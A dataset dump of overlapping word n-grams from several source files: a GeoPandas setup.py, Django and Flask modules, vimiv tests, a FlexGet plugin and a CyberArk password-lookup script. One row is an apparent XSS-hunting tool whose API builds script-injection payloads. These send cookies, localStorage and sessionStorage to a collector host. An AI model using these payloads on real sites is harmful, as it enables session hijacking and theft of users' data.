Column `ngram` (lists of strings), 67.8k rows. Each row is a set of overlapping fixed-width word windows sliced from a single source file; the four sample rows below are shown deduplicated, as the source text their windows cover.
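The samples are 13-word windows over a whitespace tokenization, apparently with stride 1. A sketch of how such rows could be generated; the parameters are inferred from the samples, not recovered from the dataset's build script:

```python
def word_windows(text, size=13, stride=1):
    """Slide a fixed-size window over the whitespace-split words of a file."""
    words = text.split()
    if len(words) <= size:
        return [" ".join(words)]
    return [" ".join(words[i:i + size])
            for i in range(0, len(words) - size + 1, stride)]
```

Applied to a source file (e.g. `word_windows(open("setup.py").read())`), this yields a list of strings shaped like the rows below.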
Row 1: a GeoPandas `setup.py`. The captured window opens at `import os`; `versioneer`, `LONG_DESCRIPTION`, `data_files`, and `INSTALL_REQUIRES` are referenced but defined outside the window, and `<EMAIL>` is a scrubbing placeholder left as captured.

```python
import os

try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

setup(
    name="geopandas",
    version=versioneer.get_version(),
    description="Geographic pandas extensions",
    license="BSD",
    author="GeoPandas contributors",
    author_email="<EMAIL>",
    url="http://geopandas.org",
    long_description=LONG_DESCRIPTION,
    packages=[
        "geopandas",
        "geopandas.io",
        "geopandas.tools",
        "geopandas.datasets",
        "geopandas.tests",
        "geopandas.tools.tests",
    ],
    package_data={"geopandas": data_files},
    python_requires=">=3.6",
    install_requires=INSTALL_REQUIRES,
    cmdclass=versioneer.get_cmdclass(),
)
```
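Since those module-level names sit before the captured window, a minimal sketch of what such a preamble might look like; every definition below is an illustrative assumption, not recovered text:

```python
# Hypothetical preamble: plausible definitions for the names setup() uses.
# None of this appears in the captured n-grams.
import versioneer  # assumed, since setup() calls versioneer.get_version()

# assumed: long description taken from the project README
with open("README.md") as f:
    LONG_DESCRIPTION = f.read()

# assumed: a plausible dependency list for a geopandas of this vintage
INSTALL_REQUIRES = ["pandas", "shapely", "fiona", "pyproj"]

# assumed: bundled example datasets shipped as package data
data_files = ["datasets/*"]
```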
Row 2: `Misc/Join Function.py`, a beginner experiment with `str.join` (most of it commented out; `<NAME>` is a scrubbing placeholder left as captured). The commented code shadows the `list` builtin, and the row ends at `print(type(a))`, so any call to `fun()` falls outside the captured window.

```python
# list = ["John","Cena","Randy","Orton","Sheamus","Khali","<NAME>"]
# # for item in list:
# #     print(item,"and",end=" ")
# #
# a = " , ".join(list)
# print(a , " other are wwe superstars")

a = 123

def fun():
    a = []
    print(type(a))
```
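For reference, re-enabling the commented-out lines would join the names with `" , "` and print them. A quick check, using `superstars` as a non-shadowing stand-in for the original `list` variable and keeping `<NAME>` as captured:

```python
superstars = ["John", "Cena", "Randy", "Orton", "Sheamus", "Khali", "<NAME>"]
a = " , ".join(superstars)
print(a, " other are wwe superstars")
# John , Cena , Randy , Orton , Sheamus , Khali , <NAME>  other are wwe superstars
```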
Row 3: `linuxmachinebeta/view/api/serializers.py`, a Django REST Framework serializer that refuses to record a second view of the same service from the same IP.

```python
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers

from linuxmachinebeta.view.models import ServiceView
from linuxmachinebeta.services.models import Service


class ServiceViewSerializer(serializers.ModelSerializer):
    service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all())

    class Meta:
        model = ServiceView
        fields = ['service']

    def validate(self, attrs):
        try:
            ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip'])
        except ServiceView.DoesNotExist:
            return attrs
        else:
            raise serializers.ValidationError(_('You have already viewed this service.'))
```
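The `validate` hook reads `user_ip` out of the serializer context, so whatever view drives this serializer has to put it there. A minimal sketch of such a caller using standard DRF generics; the view class and the IP extraction are illustrative assumptions, not part of the captured file:

```python
# Hypothetical caller: shows how the serializer's context gets its
# 'user_ip' key. Not part of the captured serializers.py.
from rest_framework import generics

from linuxmachinebeta.view.api.serializers import ServiceViewSerializer


class ServiceViewCreateView(generics.CreateAPIView):
    serializer_class = ServiceViewSerializer

    def get_serializer_context(self):
        context = super().get_serializer_context()
        # validate() does its duplicate lookup against this address
        context['user_ip'] = self.request.META.get('REMOTE_ADDR')
        return context
```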
Row 4: a Flask API module from an XSS-hunting tool (the row carries a `<gh_stars>1-10` tag but no filename). `xss_generate` assembles beacon or collector payloads from query-string flags; the remaining endpoints delete an XSS record and read or delete its captured "loot".

```python
from flask import jsonify, request
from app import db
from app.models import Client, XSS
from app.api import bp
from flask_login import login_required, current_user
from app.decorators import permissions
import json


@bp.route('/xss/generate/<id>', methods=['GET'])
@login_required
def xss_generate(id):
    """Generates an XSS payload"""
    client = Client.query.filter_by(id=id).first_or_404()
    uid = client.uid
    parameters = request.args.to_dict()
    other_data = ''
    xss_type = 'r'  # 'r' = reflected; the 'stored' flag switches this to 's'
    require_js = False
    require_params = False
    cookies = False
    local_storage = False
    session_storage = False
    get_url = False
    i_want_it_all = False
    code_type = 'html'
    if 'url' not in parameters.keys():
        return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400
    # Translate query-string flags into payload-building switches;
    # unrecognized parameters pass through as extra exfiltrated data.
    for param, value in parameters.items():
        if param == 'url':
            url = value
        elif param == 'i_want_it_all':
            i_want_it_all = True
        elif param == 'stored':
            xss_type = 's'
        elif param == 'cookies':
            cookies = True
            require_js = True
            require_params = True
        elif param == 'local_storage':
            local_storage = True
            require_js = True
            require_params = True
        elif param == 'session_storage':
            session_storage = True
            require_js = True
            require_params = True
        elif param == 'code':
            if value == 'html':
                code_type = 'html'
            elif value == 'js':
                code_type = 'js'
                require_js = True
            else:
                return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400
        elif param == 'geturl':
            get_url = True
            require_js = True
            require_params = True
        else:
            if other_data != '':
                other_data += '&'
            other_data += '{}={}'.format(param, value)
            require_params = True
    # "I want it all": load the full collector script instead of a single
    # beacon. Doubled braces are str.format escapes, so the rendered JS
    # payload starts with ';};' to close out the injected-into context.
    if i_want_it_all:
        if code_type == 'js':
            payload = ';}};var js=document.createElement("script");js.src="{}/static/collector.min.js";js.onload=function(){{sendData("{}/api/x/{}/{}","{}")}};document.body.appendChild(js);'.format(
                url, url, xss_type, uid, other_data)
            return (payload), 200
        else:
            payload = """'>"><script src={}/static/collector.min.js></script><script>sendData("{}/api/x/{}/{}", "{}")</script>""".format(
                url, url, xss_type, uid, other_data)
            return (payload), 200
    if code_type == 'js':
        payload = ';};new Image().src="'
    else:
        payload = """'>">"""
        if require_js:
            payload += '<script>new Image().src="'
        else:
            payload += '<img src="'
    payload += '{}/api/x/{}/{}'.format(url, xss_type, uid)
    # Chain the selected data sources onto the beacon URL's query string.
    if require_params:
        payload += '?'
        if cookies:
            payload += 'cookies="+encodeURIComponent(document.cookie)'
        if local_storage:
            if cookies:
                payload += '+"&'
            payload += 'local_storage="+encodeURIComponent(JSON.stringify(localStorage))'
        if session_storage:
            if cookies or local_storage:
                payload += '+"&'
            payload += 'session_storage="+encodeURIComponent(JSON.stringify(sessionStorage))'
        if get_url:
            if cookies or local_storage or session_storage:
                payload += '+"&'
            payload += 'origin_url="+encodeURIComponent(location.href)'
        if other_data != '':
            if cookies or local_storage or session_storage or get_url:
                payload += '+"&'
            payload += other_data
            payload += '"'
    if not require_params:
        payload += '"'
    if code_type == 'js':
        payload += ';'
    else:
        if require_js:
            payload += '</script>'
        else:
            payload += ' />'
    return (payload), 200


@bp.route('/xss/<xss_id>', methods=['DELETE'])
@login_required
@permissions(one_of=['admin', 'owner'])
def xss_delete(xss_id):
    """Deletes an XSS"""
    xss = XSS.query.filter_by(id=xss_id).first_or_404()
    db.session.delete(xss)
    db.session.commit()
    return jsonify({'status': 'OK', 'detail': 'XSS deleted successfully'}), 200


@bp.route('/xss/<xss_id>/<loot_type>', methods=['GET'])
@login_required
def xss_loot_get(xss_id, loot_type):
    """Gets a specific type of data for an XSS"""
    xss = XSS.query.filter_by(id=xss_id).first_or_404()
    data = json.loads(xss.data)
    return jsonify({'data': data[loot_type]}), 200


@bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE'])
@login_required
@permissions(one_of=['admin', 'owner'])
def xss_loot_delete(xss_id, loot_type):
    """Deletes a specific type of data for an XSS"""
    xss = XSS.query.filter_by(id=xss_id).first_or_404()
    data = json.loads(xss.data)
    data.pop(loot_type, None)
    xss.data = json.dumps(data)
    db.session.commit()
    return jsonify({'status': 'OK', 'detail': 'Data deleted successfully'}), 200
```
"payload += ';' else: if require_js: payload += '</script>' else: payload += '",
"'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage or session_storage or get_url:",
"get_url = True require_js = True require_params = True else: if other_data !=",
"+= '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if cookies: payload +=",
"Client, XSS from app.api import bp from flask_login import login_required, current_user from app.decorators",
"loot_type): \"\"\"Gets a specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404()",
"= 's' elif param == 'cookies': cookies = True require_js = True require_params",
"payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new",
"'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))'",
"@permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return",
"+= '\"' if not require_params: payload += '\"' if code_type == 'js': payload",
"url parameter'}), 400 for param, value in parameters.items(): if param == 'url': url",
"= \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload), 200 if",
"payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload += '+\"&' payload",
"False i_want_it_all = False code_type = 'html' if 'url' not in parameters.keys(): return",
"json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK', 'detail': 'Data deleted",
"or local_storage or session_storage or get_url: payload += '+\"&' payload += other_data payload",
"uid, other_data) return (payload), 200 if code_type == 'js': payload = ';};new Image().src=\"'",
"'js': payload += ';' else: if require_js: payload += '</script>' else: payload +=",
"payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage or session_storage",
"'</script>' else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin',",
"app.api import bp from flask_login import login_required, current_user from app.decorators import permissions import",
"= False local_storage = False session_storage = False get_url = False i_want_it_all =",
"return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid,",
"'geturl': get_url = True require_js = True require_params = True else: if other_data",
"elif value == 'js': code_type = 'js' require_js = True else: return jsonify({'status':",
"False code_type = 'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail':",
"payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def",
"login_required, current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id):",
"= True require_js = True require_params = True elif param == 'local_storage': local_storage",
"if cookies or local_storage or session_storage or get_url: payload += '+\"&' payload +=",
"other_data != '': other_data += '&' other_data += '{}={}'.format(param, value) require_params = True",
"else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner'])",
"= False require_params = False cookies = False local_storage = False session_storage =",
"'session_storage': session_storage = True require_js = True require_params = True elif param ==",
"'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for",
"return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\"",
"local_storage = False session_storage = False get_url = False i_want_it_all = False code_type",
"require_params = True if i_want_it_all: if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format(",
"'<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if",
"= XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status':",
"app.models import Client, XSS from app.api import bp from flask_login import login_required, current_user",
"app import db from app.models import Client, XSS from app.api import bp from",
"= True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif param",
"'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a",
"require_js = True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif",
"payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload",
"+= '+\"&' payload += other_data payload += '\"' if not require_params: payload +=",
"== 'html': code_type = 'html' elif value == 'js': code_type = 'js' require_js",
"require_js = False require_params = False cookies = False local_storage = False session_storage",
"other_data != '': if cookies or local_storage or session_storage or get_url: payload +=",
"other_data = '' xss_type = 'r' require_js = False require_params = False cookies",
"if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&' payload",
"param, value in parameters.items(): if param == 'url': url = value elif param",
"== 'session_storage': session_storage = True require_js = True require_params = True elif param",
"= Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data = '' xss_type =",
"url, xss_type, uid, other_data) return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format(",
"if code_type == 'js': payload += ';' else: if require_js: payload += '</script>'",
"parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param, value in",
"== 'i_want_it_all': i_want_it_all = True elif param == 'stored': xss_type = 's' elif",
"def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data for an XSS\"\"\" xss",
"value in parameters.items(): if param == 'url': url = value elif param ==",
"of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data':",
"param == 'cookies': cookies = True require_js = True require_params = True elif",
"session_storage = True require_js = True require_params = True elif param == 'code':",
"XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}),",
"not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param,",
"other_data payload += '\"' if not require_params: payload += '\"' if code_type ==",
"@login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data for",
"if require_js: payload += '<script>new Image().src=\"' else: payload += '<img src=\"' payload +=",
"200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss =",
"= False code_type = 'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error',",
"current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates",
"from app import db from app.models import Client, XSS from app.api import bp"
] |
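For illustration, a minimal client sketch for the /xss/generate/<id> route above. The base URL, client id, and login handling are assumptions; the query parameters and the shape of the returned payload follow from the route itself.

# Hypothetical client for the payload generator above. Assumes the
# Flask app is served at http://localhost:5000 and that `session`
# already carries an authenticated flask_login cookie (login flow is
# not part of this file and is omitted).
import requests

session = requests.Session()
# ... authenticate here ...

r = session.get(
    "http://localhost:5000/api/xss/generate/1",
    params={"url": "http://collector.example", "cookies": "1"},
)
# With cookies set, the route returns a script-based payload roughly like:
# '>"><script>new Image().src="http://collector.example/api/x/r/<uid>?cookies="+encodeURIComponent(document.cookie)</script>
print(r.status_code, r.text)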
#!/usr/bin/env python3

from pyaim import CCPPasswordRESTSecure

aimccp = CCPPasswordRESTSecure('https://cyberark.dvdangelo33.dev/', "clientcert.pem", verify=True)
r = aimccp.GetPassword(appid='pyAIM', safe='D-AWS-AccessKeys', username='AnsibleAWSUser')
print(r)
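A hedged sketch of consuming the response above. The key name is an assumption about the CCP JSON shape returned by pyaim, not something this snippet guarantees; check the actual object printed by the script before relying on it.

# Sketch only: 'Content' is the conventional CyberArk CCP field for the
# retrieved secret, but the exact response shape may differ by version.
secret = r.get('Content') if isinstance(r, dict) else None
if secret is None:
    raise RuntimeError('No credential returned for AnsibleAWSUser')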
'''
Post application module.
'''
from django.apps import AppConfig


class PostsConfig(AppConfig):
    '''
    :type name: str
    :type verbose_name: str
    '''
    name = 'posts'
    verbose_name = 'Posts'
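To take effect, an AppConfig like this is normally referenced from the project settings. A minimal, hypothetical settings.py fragment (the surrounding project layout is assumed):

# settings.py (fragment) - hypothetical project settings
INSTALLED_APPS = [
    "django.contrib.contenttypes",
    "django.contrib.auth",
    # Either the dotted config path, or just "posts" on Django versions
    # that auto-discover a single AppConfig subclass in posts/apps.py.
    "posts.apps.PostsConfig",
]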
# vim: ft=python fileencoding=utf-8 sw=4 et sts=4
"""Test the opening of different file-types with vimiv."""

import os
from unittest import main
from vimiv_testcase import VimivTestCase


class OpeningTest(VimivTestCase):
    """Open with different file-types Test."""

    @classmethod
    def setUpClass(cls):
        cls.init_test(cls)

    def test_opening_with_directory(self):
        """Opening with a directory."""
        expected_dir = os.path.abspath("vimiv/testimages")
        self.init_test(["vimiv/testimages"])
        self.assertEqual(expected_dir, os.getcwd())
        expected_files = ["animation", "arch-logo.png", "arch_001.jpg",
                          "directory", "symlink_to_image", "vimiv.bmp",
                          "vimiv.svg", "vimiv.tiff"]
        self.assertEqual(self.vimiv["library"].files, expected_files)
        self.assertTrue(self.vimiv["library"].is_focus())
        self.assertTrue(self.vimiv["library"].grid.is_visible())

    def test_opening_with_image(self):
        """Open with an image."""
        expected_dir = os.path.abspath("vimiv/testimages")
        self.init_test(["vimiv/testimages/arch_001.jpg"])
        # Check moving and image population
        self.assertEqual(expected_dir, os.getcwd())
        expected_images = ["arch_001.jpg", "symlink_to_image", "vimiv.bmp",
                           "vimiv.svg", "vimiv.tiff", "arch-logo.png"]
        for image in [os.path.abspath(im) for im in expected_images]:
            self.assertIn(image, self.vimiv.get_paths())

    def test_opening_with_symlink(self):
        """Open with a symlink to an image."""
        expected_dir = os.path.abspath("vimiv/testimages")
        self.init_test(["vimiv/testimages/symlink_to_image"])
        # Check moving and image population
        self.assertEqual(expected_dir, os.getcwd())
        expected_images = ["symlink_to_image", "vimiv.bmp", "vimiv.svg",
                           "vimiv.tiff", "arch-logo.png", "arch_001.jpg"]
        expected_images = [os.path.abspath(image) for image in expected_images]
        for image in [os.path.abspath(im) for im in expected_images]:
            self.assertIn(image, self.vimiv.get_paths())

    def test_opening_with_whitespace(self):
        """Open an image with whitespace and symlink in directory."""
        expected_dir = os.path.abspath("vimiv/testimages/directory/")
        self.init_test(["vimiv/testimages/directory/symlink with spaces .jpg"])
        # Check moving and image population
        self.assertEqual(expected_dir, os.getcwd())
        expected_images = ["symlink with spaces .jpg"]
        expected_images = [os.path.abspath(image) for image in expected_images]
        self.assertEqual(expected_images, self.vimiv.get_paths())

    def test_opening_recursively(self):
        """Open all images recursively."""
        # Need to backup because we init in the wrong directory here
        working_dir = self.working_directory
        os.chdir("vimiv/testimages")
        self.init_test(["."], to_set=["recursive"], values=["true"])
        self.assertEqual(8, len(self.vimiv.get_paths()))
        self.settings.reset()
        self.working_directory = working_dir

    def tearDown(self):
        self.vimiv.quit()
        os.chdir(self.working_directory)


if __name__ == "__main__":
    main()
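The module already runs itself via main() when executed directly. A sketch of driving just this test case from another script; the module name opening_test is an assumption about how the file is saved, everything else is stock unittest.

# Hypothetical runner: load only OpeningTest and run it verbosely.
import unittest
from opening_test import OpeningTest  # assumed module/file name

suite = unittest.TestLoader().loadTestsFromTestCase(OpeningTest)
unittest.TextTestRunner(verbosity=2).run(suite)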
from __future__ import unicode_literals, division, absolute_import
import logging

from flexget import plugin
from flexget.plugin import priority, register_plugin, plugins

log = logging.getLogger('builtins')


def all_builtins():
    """Helper function to return an iterator over all builtin plugins."""
    return (plugin for plugin in plugins.itervalues() if plugin.builtin)


class PluginDisableBuiltins(object):
    """Disables all (or specific) builtin plugins from a task."""

    def __init__(self):
        # cannot trust that on_task_start would have been executed
        self.disabled = []

    # TODO: schemas are registered to a uri at plugin load, the list of
    # builtins will not be complete at that time
    schema = {
        'oneOf': [
            {'type': 'boolean'},
            {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}}
        ]
    }

    def debug(self):
        log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins()))

    @priority(255)
    def on_task_start(self, task, config):
        self.disabled = []
        if not config:
            return
        for plugin in all_builtins():
            if config is True or plugin.name in config:
                plugin.builtin = False
                self.disabled.append(plugin.name)
        log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled))

    @priority(-255)
    def on_task_exit(self, task, config):
        if not self.disabled:
            return
        for name in self.disabled:
            plugin.plugins[name].builtin = True
        log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled))
        self.disabled = []

    on_task_abort = on_task_exit


register_plugin(PluginDisableBuiltins, 'disable_builtins', api_ver=2)
"all_builtins(): if config is True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name)",
"False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task,",
"', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled =",
"def all_builtins(): \"\"\"Helper function to return an iterator over all builtin plugins.\"\"\" return",
"over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin) class",
"plugin load, the list of builtins will not be complete at that time",
"def on_task_exit(self, task, config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin",
"self.disabled = [] if not config: return for plugin in all_builtins(): if config",
"would have been executed self.disabled = [] # TODO: schemas are registered to",
"debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def",
"', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for name",
"plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins",
"iterator over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin)",
"__future__ import unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.plugin",
"division, absolute_import import logging from flexget import plugin from flexget.plugin import priority, register_plugin,",
"\"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot",
"{'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}} ] }",
"the list of builtins will not be complete at that time schema =",
"plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ',",
"p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name",
"plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def",
"@priority(255) def on_task_start(self, task, config): self.disabled = [] if not config: return for",
"[] if not config: return for plugin in all_builtins(): if config is True",
"(or specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot trust that",
"from __future__ import unicode_literals, division, absolute_import import logging from flexget import plugin from",
"unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.plugin import priority,",
"'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}} ] } def",
"plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if not",
"for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin",
"'.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for name in",
"priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an",
"self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s'",
"for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ',",
"from flexget import plugin from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins')",
"at plugin load, the list of builtins will not be complete at that",
"plugin from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper",
"if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\"",
"log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self,",
"if not config: return for plugin in all_builtins(): if config is True or",
"= False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self,",
"# TODO: schemas are registered to a uri at plugin load, the list",
"from a task.\"\"\" def __init__(self): # cannot trust that on_task_start would have been",
"task, config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True",
"all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin",
"task, config): self.disabled = [] if not config: return for plugin in all_builtins():",
"plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def",
"@priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for name in self.disabled:",
"specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot trust that on_task_start",
"'.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = []",
"} def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins()))",
"not config: return for plugin in all_builtins(): if config is True or plugin.name",
"'enum': [p.name for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s'",
"config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled",
"if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin",
"plugins from a task.\"\"\" def __init__(self): # cannot trust that on_task_start would have",
"TODO: schemas are registered to a uri at plugin load, the list of",
"in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if not config:",
"%s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config):",
"on_task_exit(self, task, config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin =",
"for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if",
"all_builtins(): \"\"\"Helper function to return an iterator over all builtin plugins.\"\"\" return (plugin",
"for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ',",
"config is True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin",
"builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables",
"in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled))",
"function to return an iterator over all builtin plugins.\"\"\" return (plugin for plugin",
"all (or specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot trust",
"plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a",
"time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string',",
"self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled =",
"builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort = on_task_exit register_plugin(PluginDisableBuiltins,",
"a uri at plugin load, the list of builtins will not be complete",
"{ 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for",
"= logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an iterator over all builtin",
"class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def __init__(self):",
"that on_task_start would have been executed self.disabled = [] # TODO: schemas are",
"have been executed self.disabled = [] # TODO: schemas are registered to a",
"or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' %",
"absolute_import import logging from flexget import plugin from flexget.plugin import priority, register_plugin, plugins",
"__init__(self): # cannot trust that on_task_start would have been executed self.disabled = []",
"at that time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items':",
"in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled",
"return an iterator over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues()",
"uri at plugin load, the list of builtins will not be complete at",
"that time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type':",
"'string', 'enum': [p.name for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins:",
"all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if not config: return",
"] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in",
"in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for",
